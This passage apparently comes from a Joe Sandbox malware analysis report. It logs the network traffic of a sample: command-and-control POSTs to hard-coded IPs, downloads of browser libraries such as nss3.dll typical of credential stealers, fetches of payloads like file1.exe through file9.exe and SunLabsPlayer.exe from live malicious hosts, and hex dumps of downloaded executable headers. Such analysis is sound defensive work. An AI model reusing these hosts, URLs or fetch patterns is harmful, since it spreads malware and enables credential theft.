      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 23 Jun 2021 20:23:07 GMTContent-Type: application/x-msdos-programContent-Length: 440120Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "6b738-57aa1f0b0df80"Expires: Thu, 24 Jun 2021 20:23:07 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a6 c8 bc 41 e2 a9 d2 12 e2 a9 d2 12 e2 a9 d2 12 56 35 3d 12 e0 a9 d2 12 eb d1 41 12 fa a9 d2 12 3b cb d3 13 e1 a9 d2 12 e2 a9 d3 12 22 a9 d2 12 3b cb d1 13 eb a9 d2 12 3b cb d6 13 ee a9 d2 12 3b cb d7 13 f4 a9 d2 12 3b cb da 13 95 a9 d2 12 3b cb d2 13 e3 a9 d2 12 3b cb 2d 12 e3 a9 d2 12 3b cb d0 13 e3 a9 d2 12 52 69 63 68 e2 a9 d2 12 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 16 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 04 06 00 00 82 00 00 00 00 00 00 50 b1 03 00 00 10 00 00 00 20 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 d0 06 00 00 04 00 00 61 7a 07 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f0 43 04 00 82 cf 01 00 f4 52 06 00 2c 01 00 00 00 80 06 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 78 06 00 38 3f 00 00 00 90 06 00 34 3a 00 00 f0 66 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 28 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 50 06 00 f0 02 00 00 98 40 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 72 03 06 00 00 10 00 00 00 04 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 10 28 00 00 00 20 06 00 00 18 00 00 00 08 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 36 14 00 00 00 50 06 00 00 16 00 00 00 20 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 70 06 00 00 02 00 00 00 36 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 03 00 00 00 80 06 00 00 04 00 00 00 38 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 3a 00 00 00 90 06 00 00 3c 00 00 00 3c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 23 Jun 2021 20:23:08 GMTContent-Type: application/x-msdos-programContent-Length: 1246160Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "1303d0-57aa1f0b0df80"Expires: Thu, 24 Jun 2021 20:23:08 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 23 83 34 8c 67 e2 5a df 67 e2 5a df 67 e2 5a df 6e 9a c9 df 73 e2 5a df be 80 5b de 65 e2 5a df f9 42 9d df 63 e2 5a df be 80 59 de 6a e2 5a df be 80 5f de 6d e2 5a df be 80 5e de 6c e2 5a df 45 82 5b de 6f e2 5a df ac 81 5b de 64 e2 5a df 67 e2 5b df 90 e2 5a df ac 81 5e de 6d e3 5a df ac 81 5a de 66 e2 5a df ac 81 a5 df 66 e2 5a df ac 81 58 de 66 e2 5a df 52 69 63 68 67 e2 5a df 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ad 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 0e 00 00 1e 04 00 00 00 00 00 77 f0 0e 00 00 10 00 00 00 00 0f 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 13 00 00 04 00 00 b7 bb 13 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 9d 11 00 88 a0 00 00 88 3d 12 00 54 01 00 00 00 b0 12 00 70 03 00 00 00 00 00 00 00 00 00 00 00 e6 12 00 d0 1d 00 00 00 c0 12 00 14 7d 00 00 70 97 11 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 97 11 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 81 e8 0e 00 00 10 00 00 00 ea 0e 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 10 52 03 00 00 00 0f 00 00 54 03 00 00 ee 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 47 00 00 00 60 12 00 00 22 00 00 00 42 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 70 03 00 00 00 b0 12 00 00 04 00 00 00 64 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 14 7d 00 00 00 c0 12 00 00 7e 00 00 00 68 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 23 Jun 2021 20:23:12 GMTContent-Type: application/x-msdos-programContent-Length: 144848Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "235d0-57aa1f0b0df80"Expires: Thu, 24 Jun 2021 20:23:12 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 6c 24 1c e6 0d 4a 4f e6 0d 4a 4f e6 0d 4a 4f ef 75 d9 4f ea 0d 4a 4f 3f 6f 4b 4e e4 0d 4a 4f 3f 6f 49 4e e4 0d 4a 4f 3f 6f 4f 4e ec 0d 4a 4f 3f 6f 4e 4e ed 0d 4a 4f c4 6d 4b 4e e4 0d 4a 4f 2d 6e 4b 4e e5 0d 4a 4f e6 0d 4b 4f 7e 0d 4a 4f 2d 6e 4e 4e f2 0d 4a 4f 2d 6e 4a 4e e7 0d 4a 4f 2d 6e b5 4f e7 0d 4a 4f 2d 6e 48 4e e7 0d 4a 4f 52 69 63 68 e6 0d 4a 4f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 bf 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 b6 01 00 00 62 00 00 00 00 00 00 97 bc 01 00 00 10 00 00 00 d0 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 50 02 00 00 04 00 00 09 b1 02 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 03 02 00 a8 00 00 00 b8 03 02 00 c8 00 00 00 00 30 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 18 02 00 d0 1d 00 00 00 40 02 00 60 0e 00 00 d0 fe 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 ff 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 01 00 6c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 cb b4 01 00 00 10 00 00 00 b6 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 0a 44 00 00 00 d0 01 00 00 46 00 00 00 ba 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 07 00 00 00 20 02 00 00 04 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 30 02 00 00 04 00 00 00 04 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 60 0e 00 00 00 40 02 00 00 10 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 23 Jun 2021 20:23:13 GMTContent-Type: application/x-msdos-programContent-Length: 83784Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "14748-57aa1f0b0df80"Expires: Thu, 24 Jun 2021 20:23:13 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 01 f9 a3 4e 45 98 cd 1d 45 98 cd 1d 45 98 cd 1d f1 04 22 1d 47 98 cd 1d 4c e0 5e 1d 4e 98 cd 1d 45 98 cc 1d 6c 98 cd 1d 9c fa c9 1c 55 98 cd 1d 9c fa ce 1c 56 98 cd 1d 9c fa c8 1c 41 98 cd 1d 9c fa c5 1c 5f 98 cd 1d 9c fa cd 1c 44 98 cd 1d 9c fa 32 1d 44 98 cd 1d 9c fa cf 1c 44 98 cd 1d 52 69 63 68 45 98 cd 1d 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 0c 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 00 00 00 20 00 00 00 00 00 00 00 ae 00 00 00 10 00 00 00 00 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 bc 11 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 b0 f0 00 00 14 09 00 00 c0 10 01 00 8c 00 00 00 00 20 01 00 08 04 00 00 00 00 00 00 00 00 00 00 00 08 01 00 48 3f 00 00 00 30 01 00 94 0a 00 00 b0 1f 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 1f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 e9 00 00 00 10 00 00 00 ea 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 44 06 00 00 00 00 01 00 00 02 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b8 05 00 00 00 10 01 00 00 06 00 00 00 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 08 04 00 00 00 20 01 00 00 06 00 00 00 f6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 0a 00 00 00 30 01 00 00 0c 00 00 00 fc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Source: global trafficHTTP traffic detected: POST /865 HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 159.69.20.131Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
      Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 159.69.20.131Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 159.69.20.131Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 159.69.20.131Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 159.69.20.131Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: POST /932 HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 159.69.20.131Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
      Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 159.69.20.131Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 159.69.20.131Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 159.69.20.131Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 159.69.20.131Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 159.69.20.131Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 159.69.20.131Connection: Keep-Alive
      Source: Joe Sandbox ViewIP Address: 136.144.41.152 136.144.41.152
      Source: Joe Sandbox ViewIP Address: 185.20.227.194 185.20.227.194
      Source: Joe Sandbox ViewASN Name: WORLDSTREAMNL WORLDSTREAMNL
      Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: global trafficHTTP traffic detected: GET /server.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 136.144.41.133
      Source: global trafficHTTP traffic detected: POST /base/api/getData.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Content-Length: 133Host: 136.144.41.152
      Source: global trafficHTTP traffic detected: POST /base/api/getData.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Content-Length: 133Host: 136.144.41.152
      Source: global trafficHTTP traffic detected: POST /base/api/getData.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Content-Length: 133Host: 136.144.41.152
      Source: global trafficHTTP traffic detected: POST /base/api/getData.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Content-Length: 133Host: 136.144.41.152
      Source: global trafficHTTP traffic detected: POST /base/api/getData.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Content-Length: 133Host: 136.144.41.152
      Source: global trafficHTTP traffic detected: POST /base/api/getData.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Content-Length: 113Host: 136.144.41.152
      Source: global trafficHTTP traffic detected: HEAD /WW/file2.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 136.144.41.133Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: HEAD /WW/file9.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 136.144.41.133Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: HEAD /WW/file5.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 136.144.41.133Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: HEAD /WW/file8.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 136.144.41.133Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: HEAD /WW/file4.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 136.144.41.133Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: HEAD /WW/file7.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 136.144.41.133Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: HEAD /downloads/toolspab2.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: freeprivacytoolsforyou.xyzCache-Control: no-cache
      Source: global trafficHTTP traffic detected: HEAD /WW/file1.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 136.144.41.133Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: HEAD /campaign1/SunLabsPlayer.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: nicepricingsaleregistration.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: HEAD /WW/file6.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 136.144.41.133Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /WW/file2.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 136.144.41.133Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /downloads/toolspab2.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: freeprivacytoolsforyou.xyzCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /WW/file9.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 136.144.41.133Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /campaign1/SunLabsPlayer.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: nicepricingsaleregistration.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /WW/file5.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 136.144.41.133Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /WW/file8.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 136.144.41.133Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /WW/file4.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 136.144.41.133Cache-Control: no-cache
